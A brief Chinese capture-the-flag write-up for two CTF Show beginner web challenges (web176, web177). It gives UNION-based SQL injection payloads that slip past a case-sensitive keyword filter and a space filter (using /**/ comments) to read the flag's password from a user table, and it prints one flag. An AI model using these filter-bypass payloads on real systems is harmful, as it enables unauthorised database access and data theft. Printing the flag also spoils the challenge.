题目来源:CTF Show
一、web入门 web176
1.根据提示存在过滤,大小写过滤试一试
-1' uNion sElect 1,2,password from ctfshow_user where username="flag"--+
获得flag:ctfshow{eb72e4c5-89a5-45de-b984-abeee0610e7d}
二、web入门web177
1.题目过滤了空格,用/**/代替
-1'union/**/select/**/1,2,password/**/from/**/ctfshow_user/**/where/**/username='flag'%23
获得flag!